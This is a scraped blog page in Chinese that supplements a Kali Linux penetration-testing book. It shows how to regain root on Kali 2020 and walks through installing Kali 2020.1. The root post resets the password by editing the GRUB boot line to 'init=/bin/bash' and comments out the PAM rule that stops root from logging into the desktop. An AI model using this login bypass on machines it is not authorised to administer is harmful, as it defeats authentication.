<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL0FgsE_PEPi2YZM7e21Kpn2XwqKrXCFm9Z7BpJskQUG0FZEm7TQtDTxcjSiESHi3zdLLTJcifrBNFfgoN1dN57J-y8E7Hx-U3xJRVLHQaY06uhBZ4ddyBeEVc9hhxLYMSrHv7wRSzOYNd/s1600/IThome-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="990" data-original-width="1395" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL0FgsE_PEPi2YZM7e21Kpn2XwqKrXCFm9Z7BpJskQUG0FZEm7TQtDTxcjSiESHi3zdLLTJcifrBNFfgoN1dN57J-y8E7Hx-U3xJRVLHQaY06uhBZ4ddyBeEVc9hhxLYMSrHv7wRSzOYNd/s400/IThome-01.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTqUUwg11tv2n6iKUJw6tRy-fQnLsEgGKWyZsef99GAgJlQZXcypNEFoyskgCE4YszkQ5JR52ifk3XKbQLArogeuM-a2ebNVPTgI5Ar24GTYIWbRuoG7wQQtGklqbG29VX8Dy5nADgH1Fx/s1600/kknews-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1007" data-original-width="1236" height="325" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTqUUwg11tv2n6iKUJw6tRy-fQnLsEgGKWyZsef99GAgJlQZXcypNEFoyskgCE4YszkQ5JR52ifk3XKbQLArogeuM-a2ebNVPTgI5Ar24GTYIWbRuoG7wQQtGklqbG29VX8Dy5nADgH1Fx/s400/kknews-01.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNMxDi1T9RYJIMH2LORhPvTkL5YiJD2DusF6mjAY5yqMnXVgEC9BQUHxLgH3n0hIILbvHkyytUg2QV3dzI-SkExUA1bt7_BI-Hb7qBCtsquiDXx2fsQZNSEimjCnW9LeVZz4B1jJQfSomp/s1600/myppt-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="943" data-original-width="1288" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNMxDi1T9RYJIMH2LORhPvTkL5YiJD2DusF6mjAY5yqMnXVgEC9BQUHxLgH3n0hIILbvHkyytUg2QV3dzI-SkExUA1bt7_BI-Hb7qBCtsquiDXx2fsQZNSEimjCnW9LeVZz4B1jJQfSomp/s400/myppt-01.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTKZdlCSQcsjbeX2t-r6C1N-ZanPmADcviVacz8YGitfaSfDpjZz-OK9nOunB80bVtVimLn_dAX8EYh1sCDTCTTswOC_IuaRAGhkTZlWiexWuHbCHsqu-Pijkf7CJDCkaFCRl_nz8VRlTc/s1600/qq-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1009" data-original-width="1196" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTKZdlCSQcsjbeX2t-r6C1N-ZanPmADcviVacz8YGitfaSfDpjZz-OK9nOunB80bVtVimLn_dAX8EYh1sCDTCTTswOC_IuaRAGhkTZlWiexWuHbCHsqu-Pijkf7CJDCkaFCRl_nz8VRlTc/s400/qq-01.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLP1ZOUB5szVcNixnYMnX_oZ8mP6Wy_Ce4z6hlkUuhjxhT4iYfFN3KanEAtiw94iRU9DmzHaQH-mLwOs825YWET_XG1ghB1c36TdPVOwva6oNbBA3_6SMnkQM1_vySvxwCJnfnTP9qFoK-/s1600/%25E7%259C%258B%25E9%259B%25AAkansue-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="986" data-original-width="1072" height="367" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLP1ZOUB5szVcNixnYMnX_oZ8mP6Wy_Ce4z6hlkUuhjxhT4iYfFN3KanEAtiw94iRU9DmzHaQH-mLwOs825YWET_XG1ghB1c36TdPVOwva6oNbBA3_6SMnkQM1_vySvxwCJnfnTP9qFoK-/s400/%25E7%259C%258B%25E9%259B%25AAkansue-01.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiajFrDh9ZeMmeqWYHyy263Q5xcp7eqrhc3iwpqhQbgvr-yK4h8kWrPSxIYgcvzSsqZ94GLJc7y5-eycjWMttM6OhP6U9Il1FVBLYZYyD9cfGSrOFUmi4VQQWers672KMvF0TWMxgpU6hXb/s1600/Hinet-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="956" data-original-width="1297" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiajFrDh9ZeMmeqWYHyy263Q5xcp7eqrhc3iwpqhQbgvr-yK4h8kWrPSxIYgcvzSsqZ94GLJc7y5-eycjWMttM6OhP6U9Il1FVBLYZYyD9cfGSrOFUmi4VQQWers672KMvF0TWMxgpU6hXb/s400/Hinet-01.JPG" width="400" /></a></div>
<br />
<br /></div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-54988427297818395332020-03-28T04:27:00.003+08:002020-03-28T04:27:57.976+08:00拿回Kali的ROOT主控權<div style="border: #0000cc 4px solid; font-size: 12pt; line-height: 200%; padding: 8px;">
<div style="margin: 0.5em 0; text-indent: 2em;">
「<a href="http://atic-tw.blogspot.com/2020/02/kali-linux-2kali-linux.html" target="_blank">Kali Linux 滲透測試工具(第三版)-第2章「安裝Kali Linux」補充說明 </a>」提到,2020年的Kali預設不提供<b> root</b> 登入,在使用一段時間後,發現執行滲透測試,沒有 <b>root</b> 權限很不方便,決定要拿回 <b>root</b> 權限!如果你也有這個需求,可以參考本篇內容。</div>
<div>
<b>一、為root重設密碼</b></div>
<div style="margin-left: 2em;">
按照正常程序登入系統,重設root密碼。</div>
<div style="background-color: black; color: white; margin-left: 2em; padding: 0.5em;">
<span style="color: yellow;"><b>kali@kali2020A:~$</b></span> sudo passwd root<br />
New password: <span style="color: lime;">輸入新密碼,輸入時是看不到內容的</span><br />
Retype new password: <span style="color: lime;">輸入確認密碼,輸入時是看不到內容的</span><br />
passwd: password updated successfully <span style="color: lime;">看到這段字,表示密碼設定成功</span></div>
<br />
<div style="margin-left: 2em;">
<b>如果正常程序無法修改root密碼,請改用下面方式:</b></div>
<div style="margin-left: 2em;">
<div style="margin-left: 1em; text-indent: -1em;">
1. 重新開機,在出現啟動選單時按下「<span style="font-size: large;"><span style="color: #990000;"><b>e</b></span></span>」鍵 ,進入GRUM的開機程序腳本編輯畫面。</div>
<div style="margin-left: 1em; text-indent: -1em;">
2. 找到「<span style="color: #990000;"><b>link /boot/...</b></span>」這一列,將中間的「<b><span style="color: #990000;">ro</span></b>」(唯讀)改成「<span style="color: #990000;"><b>rw</b></span>」(讀寫),並在這一列的最後面加一個空格,然後輸入「<span style="color: #990000;"><b>init=/bin/bash</b></span>」</div>
<div style="margin-left: 1em; text-indent: -1em;">
3. 完成開機腳本修改後,按<span style="color: #cc0000;"><b>Ctrl+x</b></span>繼續啟動作業,此時會進入<b>root</b>的單人作業模式。</div>
<div style="margin-left: 1em; text-indent: -1em;">
4. 在終端機執行<b>passwd</b>:</div>
</div>
<div style="background-color: black; color: white; margin-left: 2em; padding: 0.5em;">
<b><span style="color: yellow;">kali@kali2020A:~$</span> </b>passwd<br />
New password:<br />
Retype new password:<br />
passwd: password updated successfully</div>
<br />
<div style="margin-left: 2em; text-indent: -2em;">
二、修改<b>root</b>密碼只是為了得到密碼資訊,當開機後,確實可以用<b>root</b>登入純文字終端機,卻依然無法登入<b>X-window</b>,請用nano或vi編輯「<b>/etc/pam.d/gdm-password</b>」,將「<b>auth required pam_succeed_if.so user != root quiet_success</b>」這一列註解掉,存檔後,重新開機。</div>
<div style="background-color: black; color: white; margin-left: 2em; padding: 0.5em;">
#%PAM-1.0<br />
auth requisite pam_nologin.so<br />
<span style="color: #ea9999;"><b>#</b> auth required pam_succeed_if.so user != root quiet_success <span style="color: lime;"> (註解此列)</span></span><br />
@include common-auth<br />
auth optional pam_gnome_keyring.so<br />
@include common-account</div>
<br />
<div style="margin-left: 2em; text-indent: -2em;">
<b>三、大功告成!</b></div>
<div style="margin-left: 2em;">
現在無論純文字終端機,或x-window都可以用<span style="font-size: large;"><b> root</b></span> 身分登入了!
</div>
</div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-19115650611807837382020-02-15T16:57:00.000+08:002020-02-15T16:57:02.218+08:00Kali Linux 滲透測試工具(第三版)-第2章「安裝Kali Linux」補充說明<div style="border: #0000cc 4px solid; font-size: 12pt; line-height: 200%; padding: 8px;">
<div style="margin: 0.5em 0; text-indent: 2em;">
《<a href="https://atic-tw.blogspot.com/2019/12/kali-linux-20191225.html" target="_blank"><b>Kali Linux 滲透測試工具(第三版)</b></a>》是依 Kali 2019.2 及 2019.3 版本編寫,但付梓後,Kali 隨即發布 2019.4 版,在<b> 2020.1.28</b> 再更新<b> 2020.1</b> 版,這兩個版本的預設環境,和之前版本略有不同,因此,<span style="color: #660000;">書中第二章部分內容可能不適用</span>,讀者必須視版本自行調整。<span style="color: #990000;"><b>本篇博文針對2020.1的變更,提供摘要說明</b></span>。
</div>
<div style="margin: 0.5em 0; text-indent: 2em;">
<span style="font-size: large;"><b>首先</b></span>,直接影響的有:<b>x-window 的預設界面由 <span style="color: blue;">GNOME</span> 改成 <span style="color: #274e13;">Xfce</span></b>,據說Xfce較不耗資源,對滲透測試人員來講,資源應用會比畫面美觀重要。對於用慣GNOME的人,還是可以另外安裝GNOME。<br />
apt update && apt upgrade-y<br />
<b>apt install gnome</b>
</div>
<div style="margin: 0.5em 0 0.5em 0; text-indent: 2em;">
<span style="font-size: large;"><b>再來</b></span>是Live模式的<span style="color: #990000;"><b>預設帳密已從 root / toor 改成 kali / kali</b></span>,2020.1版不再提供root帳號。依照Kali官方說明,需要root權限的工具愈來愈少,而有些工具甚至要求非root權限(像chrome)。但nmap有些功能還是需要root身分才能正常作業,例如「-sS」選項,nmap預設使用-sS探測端口的開/閉情形,但非root模式時,則改用-sT掃描。</div>
<div style="margin: 0.5em 0 0 0;">
<span style="color: #0c343d; font-size: large;"><b>2020.1版的其他改變:</b></span>
</div>
<div style="margin: 0.5em 0 0.5em 4em; text-indent: -2em;">
不再提供不同桌面的安裝映像檔,現在只剩3個版(各分32bit/64bit):Installer、Live、NetInstaller。
</div>
<div style="margin-left: 7em; text-indent: -3em;">
<span style="color: #660000;"><b>Installer</b></span>:可以離線安裝,裡頭已包含各項工具,但使用者必須在安裝過程中自行選擇想安裝的內容。
</div>
<div style="margin-left: 7em; text-indent: -3em;">
<span style="color: #660000;"><b>NetInstall</b></span>:線上安裝,只需下載必要核心,其它部分在安裝時,從網路下載。
</div>
<div style="margin-left: 7em; text-indent: -3em;">
<span style="color: #660000;"><b>Live</b></span>:就和以前的Live版一樣,可以燒錄到DVD或USB,如前所述,它的帳號及密碼已改用 kali/kali,不再是root/toor。
</div>
<div style="margin: 0.5em 0 0.5em 4em; text-indent: -2em;">
2<b>019.4需要另外安裝的<span style="color: #cc0000;">undercover(臥底)</span>功能,2020.1已改成內建安裝</b>,但此功能只能在xfce環境使用。</div>
<div style="margin-left: 2em;">
若你的 Kali 沒有 undercover 功能,可以執「<b>suo apt install kali-undercover</b>」安裝<br />
之後即可在終端機執行「<b>kali-undercover</b>」進行切換。</div>
<div style="margin: 0.5em 0 0 0;">
<span style="color: #0c343d; font-size: large;"><b>2020.1的Installer映像檔的安裝說明:</b></span>
</div>
<div style="margin: 0.5em 0 0 2em;">
請參考本書2.1節建立虛擬機,並將下載回來的「kali-linux-2020.1-installer-amd64.iso」掛載到虛擬機的光碟機上。啟動虛擬機後,會由光碟機進入安裝程式程序,可選擇 <b>Graphical Install</b>(圖形界面安裝程序)或Install(文字界面安裝程序),兩者過程類似:</div>
<div style="margin-left: 2em; text-indent: -2em;">
<b>1、此處以Graphical Install為例說明(圖1)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqGZMJOk_Sf13U5EAnIpLfhGKH8XLfzf7ezGU1OWJwKdGw04a_HWuQsu6M_3Yy5XYdAeEKW3G2QVoxVzxQ_RJRoHfYekNm_BZB7gDqjlvi6__hpegECnZLSgtbzyBArW__YkdEGdGteZwc/s1600/kali-2020_01.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="487" data-original-width="647" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqGZMJOk_Sf13U5EAnIpLfhGKH8XLfzf7ezGU1OWJwKdGw04a_HWuQsu6M_3Yy5XYdAeEKW3G2QVoxVzxQ_RJRoHfYekNm_BZB7gDqjlvi6__hpegECnZLSgtbzyBArW__YkdEGdGteZwc/s400/kali-2020_01.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖1:選擇Graphical Install以圖形化界面安裝</td></tr>
</tbody></table>
<br />
<div style="margin-left: 2em; text-indent: -2em;">
<b>2、語言選擇預設為English,這裡改成Chinese (Traditional) 中文(繁體)(圖2)</b> </div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZCT1KuOdy8PVYqzlMoT5RBV5_1FTd_btzPrcYiNEbTIUdKEJ9TuE3B0t27UoJ4ZayAI7TxN33s_TcURTeAuhr7yjlg0LK4d1duKcE4NMgvJDDWETPy0VRzbyj4U8UPV0w73tDnMeMcYQI/s1600/kali-2020_02.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="605" data-original-width="806" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZCT1KuOdy8PVYqzlMoT5RBV5_1FTd_btzPrcYiNEbTIUdKEJ9TuE3B0t27UoJ4ZayAI7TxN33s_TcURTeAuhr7yjlg0LK4d1duKcE4NMgvJDDWETPy0VRzbyj4U8UPV0w73tDnMeMcYQI/s400/kali-2020_02.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖2:選擇Chinese (Traditional) 中文(繁體)</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>3、位置選擇:臺灣(圖3)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVdPjjBNmfko3MDTLKtSn2eVFbIlQU_WKb3jSxFL40j8LMYIWI1BX3gZ4tfFenlWdWZN6kvu2w1yZJxoyRMkT-lKYnT-7N8I9pQH3jmz03JUlm6YXiP-7_MWQsv9hXZAesVs5mZKhXFo3Z/s1600/kali-2020_03.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="603" data-original-width="802" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVdPjjBNmfko3MDTLKtSn2eVFbIlQU_WKb3jSxFL40j8LMYIWI1BX3gZ4tfFenlWdWZN6kvu2w1yZJxoyRMkT-lKYnT-7N8I9pQH3jmz03JUlm6YXiP-7_MWQsv9hXZAesVs5mZKhXFo3Z/s400/kali-2020_03.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖3:位置請選台灣</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>4、設定鍵盤:英文(圖4)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinzdMVOBbo80fVYrYqUCbu82QnZQFeYa2uk_2PVHdCYnN5-62Vq7BhsWQYjteKeGa2fqeGM5YaNLSQ6uyhMbVufMIdLCdx1t6VyV2iMiR2HHxO-HL6wN1A-dlh8oRb88x-a6U9sJa9ni8n/s1600/kali-2020_04.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="606" data-original-width="802" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinzdMVOBbo80fVYrYqUCbu82QnZQFeYa2uk_2PVHdCYnN5-62Vq7BhsWQYjteKeGa2fqeGM5YaNLSQ6uyhMbVufMIdLCdx1t6VyV2iMiR2HHxO-HL6wN1A-dlh8oRb88x-a6U9sJa9ni8n/s400/kali-2020_04.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖4:鍵盤請選英文</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>5、接下來就會載入基本元件(圖5),就等它跑完!</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTEkiJyQP58-FHvbCpfno_MDZ0J-nq_zMcfyMvRaO954fAof2vijg9G6zG9sD6vxJ2V2wjk0e-N5ONFqjVEcaxDSsC5XZbEFyVzuLsyoLtbgcLFPfAjSPGkGbcdeXhbxwxKp4R8FGiGBRW/s1600/kali-2020_05.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="606" data-original-width="808" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTEkiJyQP58-FHvbCpfno_MDZ0J-nq_zMcfyMvRaO954fAof2vijg9G6zG9sD6vxJ2V2wjk0e-N5ONFqjVEcaxDSsC5XZbEFyVzuLsyoLtbgcLFPfAjSPGkGbcdeXhbxwxKp4R8FGiGBRW/s400/kali-2020_05.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖5:載入所需元件</td></tr>
</tbody></table>
<br />
<div style="margin-left: 2em; text-indent: -2em;">
<b>6、在網路設定的主機名稱:預設為kali,可依自己需要修改,此處改成kali2020A(圖6)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC4x90F7dxUoX6Wg3xHaRzHifxCy2q9IqbbuvX-bDxMxHbjlCIzLW6dSzzLBYQMdysp-aTps73hX8z_CR6weCyWwNP-8gRA4GlZdLoS4dokUwcbpvhI-VLKdAEvu4PGjeR2ld9fWiSWZsh/s1600/kali-2020_06.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="609" data-original-width="807" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC4x90F7dxUoX6Wg3xHaRzHifxCy2q9IqbbuvX-bDxMxHbjlCIzLW6dSzzLBYQMdysp-aTps73hX8z_CR6weCyWwNP-8gRA4GlZdLoS4dokUwcbpvhI-VLKdAEvu4PGjeR2ld9fWiSWZsh/s400/kali-2020_06.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖6:設定電腦名稱</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>7、網域名稱:因為是Windows裡的虛擬機,故設為WORKGROUP,以便和宿主的網域一致。(圖7)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVe8zMRJEHKOxWEsWNqHqhnKt83sxMY_Fi6CQioiNssm_uzYPErKJSHHuK-wn7lOHR7g04XLUBhUcbFwjbG42Y3ZFy8Z7DrtpMS-djBU5ppJUBmYCBKS3_NO2-5bVpPydWuOPJmxNhqWMD/s1600/kali-2020_07.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="609" data-original-width="805" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVe8zMRJEHKOxWEsWNqHqhnKt83sxMY_Fi6CQioiNssm_uzYPErKJSHHuK-wn7lOHR7g04XLUBhUcbFwjbG42Y3ZFy8Z7DrtpMS-djBU5ppJUBmYCBKS3_NO2-5bVpPydWuOPJmxNhqWMD/s400/kali-2020_07.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖7:設定網域 或群組名稱</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>8、設定使用者名稱:重點,這裡會建立非管理性的帳號,代替root。請替新的使用者輸入完整姓名:請輸入使用者的姓名,例如「Kea Leeve」(圖8)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmvIqFJonESHl5KRn-FOZVhJARbHbjEs933dCDKC32q-_ZsMEUgK09nrOEy4gn5E2kI-IwaDQpAoxtumRkZHS9M7sX2cJeBL-tW5tAZiec4PYHkiCdsfdxaia1El3GnhhqazTpLzfU3xxz/s1600/kali-2020_08.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="606" data-original-width="806" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmvIqFJonESHl5KRn-FOZVhJARbHbjEs933dCDKC32q-_ZsMEUgK09nrOEy4gn5E2kI-IwaDQpAoxtumRkZHS9M7sX2cJeBL-tW5tAZiec4PYHkiCdsfdxaia1El3GnhhqazTpLzfU3xxz/s400/kali-2020_08.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖8:輸入使用者的姓名</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>9、您的帳號的使用者名稱:就是帳號啦,就依Kali官方說明,取名為 kali(圖9)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZMcknop_Q270Jec5asQupx-VEsVFfmu-4-R5-a3tTYREvwCZIRtvGyYmL7HtXfUI3MFkYKfENJ0BCEPpa_o06mXMr1O56aGp6n2Q9PFPIgXEOO6jm4bxoAOeZi293movVSh3c2nyJG-lc/s1600/kali-2020_09.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="612" data-original-width="807" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZMcknop_Q270Jec5asQupx-VEsVFfmu-4-R5-a3tTYREvwCZIRtvGyYmL7HtXfUI3MFkYKfENJ0BCEPpa_o06mXMr1O56aGp6n2Q9PFPIgXEOO6jm4bxoAOeZi293movVSh3c2nyJG-lc/s400/kali-2020_09.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖9:輸入使用者的帳號</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>10、設定密碼:kali (圖10</b>)</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRLVINN1wWey_Jx9kEiICcZRp7SzgV51VZY2YhsNgOAj1tYWJnXbE-i1cTbw_kRBGgrefsoNSwJcrqJFvnrbR600fjxCIPjQ59xHvvvK-yZPAlNtzdpqLQVwaJy48MeGMLxAStBY5XsqsR/s1600/kali-2020_10.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="606" data-original-width="806" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRLVINN1wWey_Jx9kEiICcZRp7SzgV51VZY2YhsNgOAj1tYWJnXbE-i1cTbw_kRBGgrefsoNSwJcrqJFvnrbR600fjxCIPjQ59xHvvvK-yZPAlNtzdpqLQVwaJy48MeGMLxAStBY5XsqsR/s400/kali-2020_10.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖10:設定使用者的密碼</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>11、接著偵測時區及磁碟,然後進入磁碟分割,直接按「繼續」到下一畫面,然後選擇「使用整顆磁碟」(圖11)</b></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfugmjtp3S2nVWUJG01pLJqkDDFEFcRULcRyh9NvebeMQaumHTcNA7a1joS5kjU8dh0Zy2bbsQLGchxUZImjVTzvhJB7YLftP3AajPsP4VVjBgjmbuV3y4s4uyEUNCZBtasQuVYJhsdS15/s1600/kali-2020_11.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="609" data-original-width="806" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfugmjtp3S2nVWUJG01pLJqkDDFEFcRULcRyh9NvebeMQaumHTcNA7a1joS5kjU8dh0Zy2bbsQLGchxUZImjVTzvhJB7YLftP3AajPsP4VVjBgjmbuV3y4s4uyEUNCZBtasQuVYJhsdS15/s400/kali-2020_11.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖11:選擇磁碟分割方式</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>12、下一畫面選擇磁碟機,因為只有一台,所以直接按「繼續」到下一畫面,在此選擇「把所有的檔案全部放到同一個分割區中」(圖12)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO5JNUu9I-ikX4qTW1u9UKPM-EufQ9O1GBwO-vh09mMh2vyP4yvNdNtoPlNrt_NvPPsJUrjxlR_3cMDCbNH0yAAFrt0PE1OwW1vRavwHzkEMn7GL6z7jUJFBlfCOTlFSpYbvN0oU115oJ_/s1600/kali-2020_12.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="606" data-original-width="806" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO5JNUu9I-ikX4qTW1u9UKPM-EufQ9O1GBwO-vh09mMh2vyP4yvNdNtoPlNrt_NvPPsJUrjxlR_3cMDCbNH0yAAFrt0PE1OwW1vRavwHzkEMn7GL6z7jUJFBlfCOTlFSpYbvN0oU115oJ_/s400/kali-2020_12.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖12:將所有檔案放到同一個分割區</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>13、下一畫面是確認磁碟分割選項,如果沒有問題,就按「繼續」吧!(圖13)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0sL8fRbHKe7WBm65kxrbl8HUFcHNqZJ8FbfqdW0eUahXlwkFLSeKXNuiwPjTWJ_v9OjIXY95uC1pICTEKZpx5vxsb42CBYOhoxIGTxw7H8pDSrZvON73XxHWwZ6lz8TCwmkmARtZPQ1lf/s1600/kali-2020_13.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="807" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0sL8fRbHKe7WBm65kxrbl8HUFcHNqZJ8FbfqdW0eUahXlwkFLSeKXNuiwPjTWJ_v9OjIXY95uC1pICTEKZpx5vxsb42CBYOhoxIGTxw7H8pDSrZvON73XxHWwZ6lz8TCwmkmARtZPQ1lf/s400/kali-2020_13.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖13:確認磁碟分割設定無誤</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>14、磁碟分割步驟的最後一步,就是將分割選項寫入磁碟,這裡記得要選<span style="background-color: yellow;">「是」</span>(圖14)(預設是停在「否」)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
